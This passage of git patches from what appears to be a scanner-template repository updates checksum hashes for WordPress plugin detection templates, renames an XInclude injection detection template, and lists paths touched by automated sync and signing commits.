-http/technologies/wordpress/plugins/password-protected.yaml:8873f1ee4390983111212d82a5fa816e84da0a2d -http/technologies/wordpress/plugins/pdf-embedder.yaml:d13da3f9ea531dc407d2deef3d1663d999997562 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:5b59a21bffe9512f78bf597dc8d9172694829d0a -http/technologies/wordpress/plugins/pixelyoursite.yaml:069a5948d4e0121e1d91c9fad8a219008dd34bb6 -http/technologies/wordpress/plugins/polylang.yaml:0ee36865d4b3dc79281c9337d08dc5eefa09ceb0 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:f99ccfbc8bcded9aed5ac8f99c2a7600b8dcf059 -http/technologies/wordpress/plugins/post-smtp.yaml:f9cdd02115793f118ee301654413310f30b35286 -http/technologies/wordpress/plugins/post-types-order.yaml:c28a24170dee5ba4794c1cb2320d58d5a194f6b6 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:9f35b7bce1451c4d3e6bf21e7c1e0bdb50dc1771 -http/technologies/wordpress/plugins/pretty-link.yaml:7b8cb38f74f6a7dcb8f5d5f3cdb77c3ff28d9655 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:b8152d8256be9662167190994e7678cb8d50b911 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:61424cd26cf6afa4091b087a199819c5ab237a57 -http/technologies/wordpress/plugins/redirection.yaml:6fb1609582f2b033ca554158fc8111356c8ef398 -http/technologies/wordpress/plugins/redux-framework.yaml:61666a8f1b2e5b0550ea81240d89a37f2aec018c -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:6a907ec5919875074a9fedca73648ce029a7171a -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:a6a732b8141285b8ac2c430625a51d09fd61c106 -http/technologies/wordpress/plugins/safe-svg.yaml:0abf9b74078aa433b2296f4898fea66b1940ff9e -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:749f5b20bb063cc4bb7568b1e0e64f37821c63aa -http/technologies/wordpress/plugins/sg-cachepress.yaml:f2dee4dd1d0fc8070494f4c6d2623eae29faeef0 -http/technologies/wordpress/plugins/sg-security.yaml:78ec88c37afec0852a938fcdd7cdc744fa739cc0 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:567d523523b7ebda68961d0faa2e0e543a147aab -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:e4852ed1d3f9a9c1e6c549d054042ecf39100488 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:a5c8b442168c16d0504aa4c0337786a50f41d47b -http/technologies/wordpress/plugins/simple-history.yaml:a950954e0e5aeb9556c6d7d32766c203ba043511 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:932052a86e56453a02fc717d5727668dd42d5c61 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:44d4228cab2926196548fe594054975a371a29d4 -http/technologies/wordpress/plugins/smart-slider-3.yaml:77e00b187367cb8ba324b02fd2b93ab9a1ada06e -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:7c47fcd05fe7624ad86cdfdf7996482379f0dc92 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:d41ea91bd758def3c103261c7b0fd328d78cea00 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:007380d71963077625fdf08a1db370e62c998e7a -http/technologies/wordpress/plugins/sucuri-scanner.yaml:724fa3b6e05d4ec0513ceaf313355be5f4cf3c83 -http/technologies/wordpress/plugins/svg-support.yaml:d3fe99b24369eedee1178ebc3efee7902484840a -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:285438bd59d6615e1e8a1ca9f7810f76cbc0caa3 -http/technologies/wordpress/plugins/tablepress.yaml:d055fb1a8c9ba28daabf12ce64ba1e55da1942df -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:1045d3687258ed53d948cbb42dff50002cec7a77 -http/technologies/wordpress/plugins/templately.yaml:6bc4ae0f516b981c7075446febd271ec6eeefa7c -http/technologies/wordpress/plugins/the-events-calendar.yaml:addd04e81b60e701b5567cab9a6ad7a2f39f3de6 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:52e606aa09bf5d62b4effcf493a604b5aa3f63fa -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:2de4d3ff6763f57a0566a0feb74c94c6e91351bd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:31e4b8e6875538812ee2d7506bfa14807718a778 -http/technologies/wordpress/plugins/under-construction-page.yaml:f89c028b789d3c1469442f0761dc733e9f8e3efe +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:f24d0f585f2dcb853621962049caf76f2c0a4175 +http/technologies/wordpress/plugins/updraftplus.yaml:ca4d717fe515b7eb6536411561bb5541b05681fa http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:a8c112d8789b224f75fdee21f504164342481d4a +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:9a153f9dbb996c2a34fbfad57e1508bb7475bcc9 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:b9859d2738d0cb5f9d95a1708f90684a8cea2067 -http/technologies/wordpress/plugins/webp-express.yaml:f1dc43c6bfd5a4d2a08abca716f4eb15d24fe240 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:d6dbca2a837397ef314ac750919a6a1d0abd97d3 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:9aa5958a6fec3232486e1a7dabffcecd30f839ca -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:91ac4bac699abae468ae20412fb1a128391d1172 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:6c276856292ef73067c3b9fb2b272360f63a3520 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:88e2b0d37a4e446c3051b4acb725f7f7e6d02625 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:2191b546ebaa3e7d1885ec3499dfb72ac180fb7f -http/technologies/wordpress/plugins/woocommerce-payments.yaml:11befb2f13b313ac30f9522d9653d7020623f76d -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:9476c689e0d2db8f1dcb36f5afe156b17ce92d15 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:7f071c8cb054dae06c95e9bf4bc39b5b1219607f -http/technologies/wordpress/plugins/woocommerce-services.yaml:437a349c2371192c51e3749c858fc94f28b39368 -http/technologies/wordpress/plugins/woocommerce.yaml:6c452de0f97bedc65d688714d5a31efa62517987 -http/technologies/wordpress/plugins/wordfence.yaml:6da1567be237b5918d29b654cd07e53aa513d0fa -http/technologies/wordpress/plugins/wordpress-importer.yaml:7cac168974312671c5861e1e0965bc3a8b74178f -http/technologies/wordpress/plugins/wordpress-seo.yaml:6152c9c31da20db6ddb07a19ff6dfb50030e6bd9 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:bb9cec1eb9b7689e8afa5f9f967d0827f0547fe7 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:85ec05387023c62e59deed5e297d2c91fefc8d94 -http/technologies/wordpress/plugins/wp-file-manager.yaml:fa1ba8fb3fa79cd72f5114cf4cd17a43c687af9b -http/technologies/wordpress/plugins/wp-google-maps.yaml:87bae1623c501b7a4155c77f46933a5c42bc6ea8 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:75eaa01dadbf24bd9ab0bc0be1d795375e0f34e7 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:9f8adb86e971de723482a26b77d49380ffe9bab7 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:6d23c570b800f9b47cd6b533c4f1b5d827cde5cf -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:7e8d61d4b5cbed4da9dbb03235845509fd823c2c -http/technologies/wordpress/plugins/wp-optimize.yaml:46e5daa58e9b30d9893c52ef06a37a1380cbf6af -http/technologies/wordpress/plugins/wp-pagenavi.yaml:d63254279741a68af313321a111dcb500947196a -http/technologies/wordpress/plugins/wp-reset.yaml:bc18441325506791fed82d6f95f1562ab38fab81 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:4264d1cba523b247f81494b330c4f48e142be73b -http/technologies/wordpress/plugins/wp-rollback.yaml:87da2f85342e7f1454d78d39369b03e7d6d58a51 -http/technologies/wordpress/plugins/wp-seopress.yaml:046e7e0b881e6ca75eb6cbf307e7f9f1404e9dab -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:90f90d87e5a57730af8229ef764b557aa76fab15 -http/technologies/wordpress/plugins/wp-smushit.yaml:8797eb9d9a97394fd9499925391e64df9083d419 -http/technologies/wordpress/plugins/wp-statistics.yaml:aac0df1c4b721a927a82395f1d539131d7774014 -http/technologies/wordpress/plugins/wp-super-cache.yaml:054c62a48f4db164625824028b2e2f7444affbea +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:882986f1cd911b724eb9b9baba864395226b2952 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:4b4f07af0fba2cf7a4c6f7d5ee81437578757afc -http/technologies/wordpress/plugins/wpforms-lite.yaml:57d35c802d9960d052d8d1704d582e3121b82c55 -http/technologies/wordpress/plugins/wps-hide-login.yaml:6f1615375df945c8f8dbe093be9a3850df569536 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:9003630715b06cc3ea1a61887b12c149ac7413dd +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:7a5922dea5d84fecfbe6c6aa0fb4e0746074ead1 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8815,7 +8816,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:136c12ba3e0399c67c6304103c42a0313dc50597 +templates-checksum.txt:c991712c61f88b144349a35e7e88926ac9501db1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 92c22abe54b133a85743259c0c30c710be96612b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 2 Jul 2024 09:43:21 +0530 Subject: [PATCH 0793/1841] Update and rename csv-injection.yaml to xinclude-injection.yaml --- .../{csv-injection.yaml => xinclude-injection.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename dast/vulnerabilities/{csv-injection.yaml => xinclude-injection.yaml} (95%) diff --git a/dast/vulnerabilities/csv-injection.yaml b/dast/vulnerabilities/xinclude-injection.yaml similarity index 95% rename from dast/vulnerabilities/csv-injection.yaml rename to dast/vulnerabilities/xinclude-injection.yaml index 056ac464c5..8a58114fce 100644 --- a/dast/vulnerabilities/csv-injection.yaml +++ b/dast/vulnerabilities/xinclude-injection.yaml @@ -1,7 +1,7 @@ -id: csv-injection +id: xinclude-injection info: - name: XInclude Injection Detection + name: XInclude Injection - Detection author: DhiyaneshDK,ritikchaddha severity: high description: | From 43ce576d2ccddf8cc45dc11cc088e928a6a45442 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 2 Jul 2024 04:13:23 +0000 Subject: [PATCH 0794/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 821feca037..e05fb131c0 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,6 +17,7 @@ on: - 'http/default-logins/jeedom/jeedom-default-login.yaml' - 'http/exposed-panels/apache/apache-apollo-panel.yaml' - 'http/exposed-panels/dialogic-xms-console.yaml' + - 'http/exposed-panels/endpoint-protector-panel.yaml' - 'http/exposures/configs/filestash-admin-config.yaml' - 'http/exposures/configs/neo4j-neodash-config.yaml' - 'http/misconfiguration/forgejo-repo-exposure.yaml' From 23e3ea2957e00d889b43107f14d0cb2cf9fcda68 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Jul 2024 04:14:28 +0000 Subject: [PATCH 0795/1841] Auto Template Signing [Tue Jul 2 04:14:27 UTC 2024] :robot: --- http/exposed-panels/endpoint-protector-panel.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 